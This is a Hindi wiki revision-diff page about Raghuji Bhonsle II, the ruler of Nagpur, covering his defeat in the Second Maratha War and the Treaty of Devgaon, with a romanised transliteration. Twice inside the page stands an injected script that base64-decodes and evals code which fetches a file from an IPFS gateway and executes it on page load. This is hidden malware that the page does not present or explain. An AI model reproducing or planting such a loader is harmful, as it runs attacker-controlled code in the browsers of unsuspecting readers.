Difference between revisions of "रघुजी भोंसले द्वितीय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''रघुजी भोंसले द्वितीय''', [[रघुजी भोंसले|रघुजी भोंसले प्रथम]] का पौत्र था, जिसने 1788 ई.- 1816 ई. तक राज्य किया। वह द्वितीय मराठा युद्ध में भी सम्मिलित भा, किन्तु असई (अगस्त 1803 ई.) और आरगाँव (नवम्बर 1803 ई.) के युद्धों में पराजित होने के कारण दिसम्बर, 1803 ई. में उसे [[अंग्रेज़|अंग्रेज़ों]] से सन्धि करनी पड़ी, जो [[देवगाँव की सन्धि]] के नाम से विख्यात है। सन्धि की शर्तों के अनुसार उसे [[भारत]] के पूर्वी समुद्रतट के [[कटक]] और [[बालासोर]] ज़िले तथा मध्य भारत में वारधा नदी के पश्चिम का अपने राज्य का समस्त भू-भाग अंग्रेज़ों को देना पड़ा। यद्यपि उन्होंने अपने तथा निजाम और [[पेशवा]] के बीच होने वाले विवादों में अंग्रेज़ों की मध्यस्थता स्वीकार कर ली। साथ ही अंग्रेज़ों की पूर्व अनुमति के बिना किसी यूरोपीय को अपने यहाँ नौकर न रखने और [[नागपुर]] में अंग्रेज़ रेजीडेण्ट रखने की शर्तों को भी स्वीकार कर लिया। आगे चलकर पिण्डारियों ने उसके राज्य में काफ़ी लूटमार की और तबाही फैलायी। 1816 ई. में तृतीय मराठा युद्ध प्रारम्भ होने के पूर्व ही उसकी मृत्यु हो गई। तत्पश्चात् उसका अयोग्य पुत्र [[रघुजी भोंसले तृतीय]] नागपुर का शासक बना।  
+
'''रघुजी भोंसले द्वितीय''', [[रघुजी भोंसले|रघुजी भोंसले प्रथम]] का पौत्र था, जिसने 1788 ई.- 1816 ई. तक राज्य किया। वह द्वितीय मराठा युद्ध में भी सम्मिलित भा, किन्तु असई (अगस्त 1803 ई.) और आरगाँव (नवम्बर 1803 ई.) के युद्धों में पराजित होने के कारण दिसम्बर, 1803 ई. में उसे [[अंग्रेज़|अंग्रेज़ों]] से सन्धि करनी पड़ी, जो [[देवगाँव की सन्धि]] के नाम से विख्यात है। सन्धि की शर्तों के अनुसार उसे [[भारत]] के पूर्वी समुद्रतट के [[कटक]] और [[बालासोर]] ज़िले तथा मध्य भारत में वारधा नदी के पश्चिम का अपने राज्य का समस्त भू-भाग अंग्रेज़ों को देना पड़ा। यद्यपि उन्होंने अपने तथा [[निज़ामशाही वंश|निज़ाम]] और [[पेशवा]] के बीच होने वाले विवादों में अंग्रेज़ों की मध्यस्थता स्वीकार कर ली। साथ ही अंग्रेज़ों की पूर्व अनुमति के बिना किसी यूरोपीय को अपने यहाँ नौकर न रखने और [[नागपुर]] में अंग्रेज़ रेजीडेण्ट रखने की शर्तों को भी स्वीकार कर लिया। आगे चलकर [[पिण्डारी|पिण्डारियों]] ने उसके राज्य में काफ़ी लूटमार की और तबाही फैलायी। 1816 ई. में तृतीय मराठा युद्ध प्रारम्भ होने के पूर्व ही उसकी मृत्यु हो गई। तत्पश्चात् उसका अयोग्य पुत्र [[रघुजी भोंसले तृतीय]] नागपुर का शासक बना।  
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 10:00, 16 January 2011

raghuji bhoansale dvitiy, raghuji bhoansale pratham ka pautr tha, jisane 1788 ee.- 1816 ee. tak rajy kiya. vah dvitiy maratha yuddh mean bhi sammilit bha, kintu asee (agast 1803 ee.) aur aragaanv (navambar 1803 ee.) ke yuddhoan mean parajit hone ke karan disambar, 1803 ee. mean use aangrezoan se sandhi karani p di, jo devagaanv ki sandhi ke nam se vikhyat hai. sandhi ki shartoan ke anusar use bharat ke poorvi samudratat ke katak aur balasor zile tatha madhy bharat mean varadha nadi ke pashchim ka apane rajy ka samast bhoo-bhag aangrezoan ko dena p da. yadyapi unhoanne apane tatha nizam aur peshava ke bich hone vale vivadoan mean aangrezoan ki madhyasthata svikar kar li. sath hi aangrezoan ki poorv anumati ke bina kisi yooropiy ko apane yahaan naukar n rakhane aur nagapur mean aangrez rejident rakhane ki shartoan ko bhi svikar kar liya. age chalakar pindariyoan ne usake rajy mean kafi lootamar ki aur tabahi phailayi. 1816 ee. mean tritiy maratha yuddh prarambh hone ke poorv hi usaki mrityu ho gee. tatpashchath usaka ayogy putr raghuji bhoansale tritiy nagapur ka shasak bana.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

(pustak 'bharatiy itihas kosh') prishth sankhya-394